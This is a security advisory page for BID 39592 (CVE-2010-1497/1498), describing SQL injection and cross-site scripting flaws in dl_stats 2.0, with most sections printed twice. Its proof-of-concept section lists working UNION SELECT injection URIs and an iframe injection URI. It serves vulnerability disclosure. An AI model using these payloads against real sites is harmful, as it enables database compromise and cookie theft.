dl_stats Cross Site Scripting and SQL Injection Vulnerabilities
BID:39592
Info
dl_stats Cross Site Scripting and SQL Injection Vulnerabilities
| Bugtraq ID: | 39592 |
| Class: | Input Validation Error |
| CVE: |
CVE-2010-1498 CVE-2010-1497 |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 20 2010 12:00AM |
| Updated: | Apr 13 2015 09:02PM |
| Credit: | Valentin Hobel |
| Vulnerable: |
Claus van Beek dl_stats 2.0 |
| Not Vulnerable: | |
Discussion
dl_stats Cross Site Scripting and SQL Injection Vulnerabilities
dl_stats is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
dl_stats 2.0 is vulnerable; other versions may also be affected.
dl_stats is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
dl_stats 2.0 is vulnerable; other versions may also be affected.
Exploit / POC
dl_stats Cross Site Scripting and SQL Injection Vulnerabilities
An attacker can exploit these issues via a browser. To exploit a cross-site scripting issue, the attacker must entice an unsuspecting victim to follow a malicious URI.
The following example URIs are available:
http://www.example.com/view_file.php?id=6+AND+1=2+UNION+SELECT+1,concat(user()),concat(user()),concat(user()),concat(user()),6,7,concat(user())--
http://www.example.com/download.php?id=2+AND+1=2+UNION+SELECT+1,concat(user()),3,concat(user()),concat(user())--
http://www.example.com/download_proc.php?id=<iframe src=http://www.google.de>
An attacker can exploit these issues via a browser. To exploit a cross-site scripting issue, the attacker must entice an unsuspecting victim to follow a malicious URI.
The following example URIs are available:
http://www.example.com/view_file.php?id=6+AND+1=2+UNION+SELECT+1,concat(user()),concat(user()),concat(user()),concat(user()),6,7,concat(user())--
http://www.example.com/download.php?id=2+AND+1=2+UNION+SELECT+1,concat(user()),3,concat(user()),concat(user())--
http://www.example.com/download_proc.php?id=<iframe src=http://www.google.de>
Solution / Fix
dl_stats Cross Site Scripting and SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
dl_stats Cross Site Scripting and SQL Injection Vulnerabilities
References:
References:
- dl_stats - Homepage (Claus van Beek)
- dl_stats Multiple Vulnerabilities (SQLI, XSS, Unprotected Admin Panel) (valentin)
- dl_stats Multiple Vulnerabilities (SQLI, XSS, Unprotected Admin Panel) (Valentin)